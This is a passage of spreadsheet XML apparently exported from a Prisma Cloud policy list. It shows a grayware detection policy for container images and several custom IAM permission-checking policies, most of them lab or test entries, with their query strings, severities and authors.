      <c r="A3013" t="inlineStr"/>
      <c r="B3013" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3013" s="2" t="inlineStr"/>
      <c r="D3013" t="inlineStr"/>
      <c r="E3013" t="inlineStr"/>
      <c r="F3013" t="inlineStr"/>
      <c r="G3013" t="b">
        <v>1</v>
      </c>
      <c r="H30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3" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3013" t="inlineStr">
        <is>
          <t>grayware_container_image</t>
        </is>
      </c>
      <c r="K3013" t="inlineStr">
        <is>
          <t>Container image contains Grayware</t>
        </is>
      </c>
      <c r="L3013" t="inlineStr">
        <is>
          <t>MALWARE</t>
        </is>
      </c>
      <c r="M3013" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3013" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3013" t="inlineStr">
        <is>
          <t>grayware</t>
        </is>
      </c>
      <c r="P3013" t="inlineStr">
        <is>
          <t>container_image</t>
        </is>
      </c>
      <c r="Q3013" t="inlineStr"/>
      <c r="R3013" t="inlineStr"/>
      <c r="S3013" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3013" t="b">
        <v>0</v>
      </c>
      <c r="U3013" t="inlineStr">
        <is>
          <t>workload_detection</t>
        </is>
      </c>
      <c r="V3013" t="inlineStr">
        <is>
          <t>grayware</t>
        </is>
      </c>
      <c r="W3013" t="inlineStr">
        <is>
          <t>Identify if grayware has been detected on a container image</t>
        </is>
      </c>
      <c r="X3013" t="inlineStr">
        <is>
          <t>Including files flagged as malware in container images poses significant security risks. It can lead to system infections, data breaches, and application disruptions. Maintain a secure environment by excluding such files from container images.</t>
        </is>
      </c>
      <c r="Y3013" t="inlineStr"/>
      <c r="Z3013" t="inlineStr"/>
      <c r="AA3013" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3013" t="inlineStr">
        <is>
          <t>2023-09-15 06:33:27</t>
        </is>
      </c>
      <c r="AC3013" t="inlineStr"/>
      <c r="AD3013" t="b">
        <v>1</v>
      </c>
      <c r="AE3013" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3013" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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3" t="inlineStr">
        <is>
          <t>02188d88-6cc0-4666-8958-3aa0149acdef</t>
        </is>
      </c>
      <c r="AI3013" t="inlineStr"/>
      <c r="AJ3013" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK3013" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3014">
      <c r="A3014" t="inlineStr"/>
      <c r="B3014" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3014" s="2" t="inlineStr"/>
      <c r="D3014" t="n">
        <v>0</v>
      </c>
      <c r="E3014" t="n">
        <v>160</v>
      </c>
      <c r="F3014" t="n">
        <v>0</v>
      </c>
      <c r="G3014" t="b">
        <v>1</v>
      </c>
      <c r="H30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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3014" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3014" t="inlineStr">
        <is>
          <t>Permisos sobre pipelines</t>
        </is>
      </c>
      <c r="L3014" t="inlineStr"/>
      <c r="M3014" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3014" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3014" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3014" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3014" t="inlineStr"/>
      <c r="R3014" t="inlineStr"/>
      <c r="S3014" t="inlineStr"/>
      <c r="T3014" t="b">
        <v>0</v>
      </c>
      <c r="U3014" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3014" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3014" t="inlineStr">
        <is>
          <t>Cloud Code Security Legacy Licensing</t>
        </is>
      </c>
      <c r="X3014" t="inlineStr"/>
      <c r="Y3014" t="inlineStr"/>
      <c r="Z3014" t="inlineStr">
        <is>
          <t>config from iam where action.name CONTAINS ALL ( 'iam:PassRole', 'datapipeline:ActivatePipeline', 'datapipeline:CreatePipeline', 'datapipeline:PutPipelineDefinition') AND dest.cloud.wildcardscope = true and grantedby.cloud.policy.condition ('iam:PassedToService') does not exist</t>
        </is>
      </c>
      <c r="AA3014" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB3014" t="inlineStr">
        <is>
          <t>2024-09-19 15:47:42</t>
        </is>
      </c>
      <c r="AC3014" t="inlineStr"/>
      <c r="AD3014" t="b">
        <v>0</v>
      </c>
      <c r="AE3014" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3014" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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4" t="inlineStr">
        <is>
          <t>a2427681-0aa7-4d31-811d-7fcb5141f14b</t>
        </is>
      </c>
      <c r="AI3014" t="inlineStr">
        <is>
          <t>443f9742-14a4-4544-93fc-5c1369ebbbcd</t>
        </is>
      </c>
      <c r="AJ3014" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3014" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3015">
      <c r="A3015" t="inlineStr"/>
      <c r="B3015" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3015" s="2" t="inlineStr"/>
      <c r="D3015" t="n">
        <v>23</v>
      </c>
      <c r="E3015" t="n">
        <v>519</v>
      </c>
      <c r="F3015" t="n">
        <v>2</v>
      </c>
      <c r="G3015" t="b">
        <v>1</v>
      </c>
      <c r="H30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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3015" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3015" t="inlineStr">
        <is>
          <t>saraTest</t>
        </is>
      </c>
      <c r="L3015" t="inlineStr"/>
      <c r="M3015" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N3015" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3015" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3015" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3015" t="inlineStr"/>
      <c r="R3015" t="inlineStr"/>
      <c r="S3015" t="inlineStr"/>
      <c r="T3015" t="b">
        <v>0</v>
      </c>
      <c r="U3015" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3015" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3015" t="inlineStr"/>
      <c r="X3015"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15" t="inlineStr"/>
      <c r="Z3015" t="inlineStr">
        <is>
          <t>config from iam where action.access.isadministrative = true</t>
        </is>
      </c>
      <c r="AA3015" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB3015" t="inlineStr">
        <is>
          <t>2024-11-12 18:56:20</t>
        </is>
      </c>
      <c r="AC3015" t="inlineStr"/>
      <c r="AD3015" t="b">
        <v>0</v>
      </c>
      <c r="AE3015" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3015" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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5" t="inlineStr">
        <is>
          <t>5d7c4eb9-0e86-402b-bbc9-635e029a6352</t>
        </is>
      </c>
      <c r="AI3015" t="inlineStr">
        <is>
          <t>9966c4ee-2d41-406b-849e-d41aaf1e5d67</t>
        </is>
      </c>
      <c r="AJ3015" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3015" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3016">
      <c r="A3016" t="inlineStr"/>
      <c r="B3016" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3016" s="2" t="inlineStr"/>
      <c r="D3016" t="inlineStr"/>
      <c r="E3016" t="inlineStr"/>
      <c r="F3016" t="inlineStr"/>
      <c r="G3016" t="b">
        <v>0</v>
      </c>
      <c r="H30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16" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3016" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3016" t="inlineStr">
        <is>
          <t>cku-policy-01</t>
        </is>
      </c>
      <c r="L3016" t="inlineStr"/>
      <c r="M3016" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3016" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3016" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3016" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3016" t="inlineStr"/>
      <c r="R3016" t="inlineStr"/>
      <c r="S3016" t="inlineStr">
        <is>
          <t>cku-policy-01</t>
        </is>
      </c>
      <c r="T3016" t="b">
        <v>0</v>
      </c>
      <c r="U3016" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3016" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3016" t="inlineStr">
        <is>
          <t>cku-policy-01</t>
        </is>
      </c>
      <c r="X3016"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16" t="inlineStr"/>
      <c r="Z3016" t="inlineStr">
        <is>
          <t>config from iam where action.name='Dynatrace.Observability/locations/operationStatuses/read' and dest.cloud.account = 'AWS Account Test Aug 25'</t>
        </is>
      </c>
      <c r="AA3016" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB3016" t="inlineStr">
        <is>
          <t>2024-11-12 19:43:00</t>
        </is>
      </c>
      <c r="AC3016" t="inlineStr"/>
      <c r="AD3016" t="b">
        <v>0</v>
      </c>
      <c r="AE3016" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3016" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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16" t="inlineStr">
        <is>
          <t>2fa4be47-2f23-42b3-9500-04afb2499543</t>
        </is>
      </c>
      <c r="AI3016" t="inlineStr">
        <is>
          <t>2d1893ac-2942-4c7f-8a6c-077fc8894653</t>
        </is>
      </c>
      <c r="AJ3016" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3016" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3017">
      <c r="A3017" t="inlineStr"/>
      <c r="B3017" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3017" s="2" t="inlineStr"/>
      <c r="D3017" t="inlineStr"/>
      <c r="E3017" t="inlineStr"/>
      <c r="F3017" t="inlineStr"/>
      <c r="G3017" t="b">
        <v>1</v>
      </c>
      <c r="H30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7" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3017" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3017" t="inlineStr">
        <is>
          <t>Avery-Onboarding-Week9</t>
        </is>
      </c>
      <c r="L3017" t="inlineStr"/>
      <c r="M3017" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3017" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3017" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3017" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3017" t="inlineStr"/>
      <c r="R3017" t="inlineStr"/>
      <c r="S3017" t="inlineStr"/>
      <c r="T3017" t="b">
        <v>0</v>
      </c>
      <c r="U3017" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3017" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3017" t="inlineStr"/>
      <c r="X3017" t="inlineStr">
        <is>
          <t>Add permissions to IAM Template</t>
        </is>
      </c>
      <c r="Y3017" t="inlineStr"/>
      <c r="Z3017" t="inlineStr">
        <is>
          <t>config from iam where action.access.level NOT IN ( 'Data Write', 'Metadata Write', 'Data Read', 'Metadata Read' )</t>
        </is>
      </c>
      <c r="AA3017" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB3017" t="inlineStr">
        <is>
          <t>2024-09-19 15:50:06</t>
        </is>
      </c>
      <c r="AC3017" t="inlineStr"/>
      <c r="AD3017" t="b">
        <v>0</v>
      </c>
      <c r="AE3017" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3017" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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7" t="inlineStr">
        <is>
          <t>0d3f2318-d505-449d-b473-4609dc4bc1c6</t>
        </is>
      </c>
      <c r="AI3017" t="inlineStr">
        <is>
          <t>edf45aa5-da9a-4377-aa4b-310fc0943c21</t>
        </is>
      </c>
      <c r="AJ3017" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3017" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3018">
      <c r="A3018" t="inlineStr"/>
      <c r="B3018" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3018" s="2" t="inlineStr"/>
      <c r="D3018" t="inlineStr"/>
      <c r="E3018" t="inlineStr"/>
      <c r="F3018" t="inlineStr"/>
      <c r="G3018" t="b">
        <v>0</v>
      </c>
      <c r="H30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18" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3018" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3018" t="inlineStr">
        <is>
          <t>alagomez custom policy2</t>
        </is>
      </c>
      <c r="L3018" t="inlineStr"/>
      <c r="M3018" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3018" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3018" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3018" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3018" t="inlineStr"/>
      <c r="R3018" t="inlineStr"/>
      <c r="S3018" t="inlineStr">
        <is>
          <t>IAM</t>
        </is>
      </c>
      <c r="T3018" t="b">
        <v>0</v>
      </c>
      <c r="U3018" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3018" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3018" t="inlineStr">
        <is>
          <t>alagomez custom policy2</t>
        </is>
      </c>
      <c r="X3018"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18" t="inlineStr"/>
      <c r="Z3018" t="inlineStr">
        <is>
          <t>config from iam where action.name = 'ec2:CreateVolume'</t>
        </is>
      </c>
      <c r="AA3018" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB3018" t="inlineStr">
        <is>
          <t>2024-11-12 19:42:59</t>
        </is>
      </c>
      <c r="AC3018" t="inlineStr"/>
      <c r="AD3018" t="b">
        <v>0</v>
      </c>
      <c r="AE3018" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3018" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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18" t="inlineStr">
        <is>
          <t>71cb2866-69d4-482a-a041-3c7ca5a2e869</t>
        </is>
      </c>
      <c r="AI3018" t="inlineStr">
        <is>
          <t>e03b6ac7-ee49-4504-96cc-d2a6a1a2a1ed</t>
        </is>
      </c>
      <c r="AJ3018" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3018" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3019">
      <c r="A3019" t="inlineStr"/>
      <c r="B3019" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3019" s="2" t="inlineStr"/>
      <c r="D3019" t="inlineStr"/>
      <c r="E3019" t="inlineStr"/>
      <c r="F3019" t="inlineStr"/>
      <c r="G3019" t="b">
        <v>0</v>
      </c>
      <c r="H30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19" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3019" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3019" t="inlineStr">
        <is>
          <t>Copy of test-iam</t>
        </is>
      </c>
      <c r="L3019" t="inlineStr"/>
      <c r="M3019" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3019" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3019" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3019" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3019" t="inlineStr"/>
      <c r="R3019" t="inlineStr"/>
      <c r="S3019" t="inlineStr"/>
      <c r="T3019" t="b">
        <v>0</v>
      </c>
      <c r="U3019" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3019" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3019" t="inlineStr">
        <is>
          <t>test-iam</t>
        </is>
      </c>
      <c r="X3019" t="inlineStr">
        <is>
          <t>new</t>
        </is>
      </c>
      <c r="Y3019" t="inlineStr"/>
      <c r="Z3019" t="inlineStr">
        <is>
          <t>config from iam where action.name CONTAINS ALL ( 'iam:PassRole', 'datapipeline:ActivatePipeline', 'datapipeline:CreatePipeline', 'datapipeline:PutPipelineDefinition') AND dest.cloud.wildcardscope = true and grantedby.cloud.policy.condition ('iam:PassedToService') does not exist</t>
        </is>
      </c>
      <c r="AA3019" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB3019" t="inlineStr">
        <is>
          <t>2024-11-12 16:36:58</t>
        </is>
      </c>
      <c r="AC3019" t="inlineStr"/>
      <c r="AD3019" t="b">
        <v>0</v>
      </c>
      <c r="AE3019" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3019" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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19" t="inlineStr">
        <is>
          <t>58f48bac-1bbc-4f67-a2d4-929de515a673</t>
        </is>
      </c>
      <c r="AI3019" t="inlineStr">
        <is>
          <t>e66d2010-ffd1-4755-8cb3-d972d6c42233</t>
        </is>
      </c>
      <c r="AJ3019" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3019" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3020">
      <c r="A3020" t="inlineStr"/>
      <c r="B3020" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3020" s="2" t="inlineStr"/>
      <c r="D3020" t="inlineStr"/>
      <c r="E3020" t="inlineStr"/>
      <c r="F3020" t="inlineStr"/>
      <c r="G3020" t="b">
        <v>0</v>
      </c>
      <c r="H30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0" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3020" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3020" t="inlineStr">
        <is>
          <t>testIAM two</t>
        </is>
      </c>
      <c r="L3020" t="inlineStr"/>
      <c r="M3020" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3020" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3020" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3020" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3020" t="inlineStr"/>
      <c r="R3020" t="inlineStr"/>
      <c r="S3020" t="inlineStr"/>
      <c r="T3020" t="b">
        <v>0</v>
      </c>
      <c r="U3020" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3020" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3020" t="inlineStr"/>
      <c r="X3020" t="inlineStr"/>
      <c r="Y3020" t="inlineStr"/>
      <c r="Z3020" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.account != 'Houser Test AWS Account'</t>
        </is>
      </c>
      <c r="AA3020" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB3020" t="inlineStr">
        <is>
          <t>2024-09-13 16:52:00</t>
        </is>
      </c>
      <c r="AC3020" t="inlineStr"/>
      <c r="AD3020" t="b">
        <v>0</v>
      </c>
      <c r="AE3020" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3020" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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0" t="inlineStr">
        <is>
          <t>d08a29a3-f8f0-4a6a-8edb-a3463271f3bc</t>
        </is>
      </c>
      <c r="AI3020" t="inlineStr">
        <is>
          <t>8b72d094-9c46-472c-869d-80508592c3c5</t>
        </is>
      </c>
      <c r="AJ3020" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3020" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3021">
      <c r="A3021" t="inlineStr"/>
      <c r="B3021" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3021" s="2" t="inlineStr"/>
      <c r="D3021" t="inlineStr"/>
      <c r="E3021" t="inlineStr"/>
      <c r="F3021" t="inlineStr"/>
      <c r="G3021" t="b">
        <v>0</v>
      </c>
      <c r="H30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1" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3021" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3021" t="inlineStr">
        <is>
          <t>JEC_Auto_IAM</t>
        </is>
      </c>
      <c r="L3021" t="inlineStr"/>
      <c r="M3021" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3021" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3021" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3021" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3021" t="inlineStr"/>
      <c r="R3021" t="inlineStr"/>
      <c r="S3021" t="inlineStr"/>
      <c r="T3021" t="b">
        <v>0</v>
      </c>
      <c r="U3021" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3021" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3021" t="inlineStr">
        <is>
          <t>This is a dumb policy</t>
        </is>
      </c>
      <c r="X3021" t="inlineStr"/>
      <c r="Y3021" t="inlineStr"/>
      <c r="Z3021" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.account != dest.cloud.account</t>
        </is>
      </c>
      <c r="AA3021" t="inlineStr">
        <is>
          <t>Marius Banica</t>
        </is>
      </c>
      <c r="AB3021" t="inlineStr">
        <is>
          <t>2024-09-13 16:53:47</t>
        </is>
      </c>
      <c r="AC3021" t="inlineStr"/>
      <c r="AD3021" t="b">
        <v>0</v>
      </c>
      <c r="AE3021" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3021" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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1" t="inlineStr">
        <is>
          <t>5181baab-22af-4c47-bb57-27bd18b7989b</t>
        </is>
      </c>
      <c r="AI3021" t="inlineStr">
        <is>
          <t>4794a2a7-6c7a-4803-a78a-e429b90aa797</t>
        </is>
      </c>
      <c r="AJ3021" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3021" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3022">
      <c r="A3022" t="inlineStr"/>
      <c r="B3022" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3022" s="2" t="inlineStr"/>
      <c r="D3022" t="inlineStr"/>
      <c r="E3022" t="inlineStr"/>
      <c r="F3022" t="inlineStr"/>
      <c r="G3022" t="b">
        <v>0</v>
      </c>
      <c r="H30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2" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3022" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3022" t="inlineStr">
        <is>
          <t>IAM-test-sync</t>
        </is>
      </c>
      <c r="L3022" t="inlineStr"/>
      <c r="M3022" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3022" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3022" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3022" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3022" t="inlineStr"/>
      <c r="R3022" t="inlineStr"/>
      <c r="S3022" t="inlineStr"/>
      <c r="T3022" t="b">
        <v>0</v>
      </c>
      <c r="U3022" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3022" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3022" t="inlineStr"/>
      <c r="X3022" t="inlineStr"/>
      <c r="Y3022" t="inlineStr"/>
      <c r="Z3022" t="inlineStr">
        <is>
          <t>config from iam where action.lastaccess.days &lt;= 90</t>
        </is>
      </c>
      <c r="AA3022" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB3022" t="inlineStr">
        <is>
          <t>2024-09-13 17:17:22</t>
        </is>
      </c>
      <c r="AC3022" t="inlineStr"/>
      <c r="AD3022" t="b">
        <v>0</v>
      </c>
      <c r="AE3022" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3022" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG30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2" t="inlineStr">
        <is>
          <t>8fda6800-f792-4b9f-8629-2ec77864cb17</t>
        </is>
      </c>
      <c r="AI3022" t="inlineStr">
        <is>
          <t>5cf7bed5-b983-4e66-974e-57254a0fdd83</t>
        </is>
      </c>
      <c r="AJ3022" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3022" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3023">
      <c r="A3023" t="inlineStr"/>
      <c r="B3023" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3023" s="2" t="inlineStr"/>
      <c r="D3023" t="n">
        <v>0</v>
      </c>
      <c r="E3023" t="n">
        <v>904</v>
      </c>
      <c r="F3023" t="n">
        <v>0</v>
      </c>
      <c r="G3023" t="b">
        <v>1</v>
      </c>
      <c r="H30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23" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3023" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3023" t="inlineStr">
        <is>
          <t>Source Cloud different than Destiny Cloud</t>
        </is>
      </c>
      <c r="L3023" t="inlineStr"/>
      <c r="M3023" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3023" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3023" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3023" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3023" t="inlineStr"/>
      <c r="R3023" t="inlineStr"/>
      <c r="S3023" t="inlineStr"/>
      <c r="T3023" t="b">
        <v>0</v>
      </c>
      <c r="U3023" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3023" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3023" t="inlineStr"/>
      <c r="X3023"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23" t="inlineStr"/>
      <c r="Z3023" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.account != dest.cloud.account</t>
        </is>
      </c>
      <c r="AA3023" t="inlineStr">
        <is>
          <t>Adam Hamilton-Sutherland</t>
        </is>
      </c>
      <c r="AB3023" t="inlineStr">
        <is>
          <t>2024-11-12 18:57:59</t>
        </is>
      </c>
      <c r="AC3023" t="inlineStr"/>
      <c r="AD3023" t="b">
        <v>0</v>
